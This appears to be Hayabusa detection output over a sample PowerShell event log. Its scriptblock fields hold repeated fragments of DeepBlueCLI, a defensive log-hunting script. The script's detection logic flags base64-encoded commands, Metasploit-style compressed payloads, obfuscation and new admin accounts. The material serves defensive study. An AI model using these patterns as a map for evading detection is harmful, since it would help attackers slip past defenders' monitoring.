$sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.705 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.705 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.705 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.705 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.708 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.714 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.717 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" 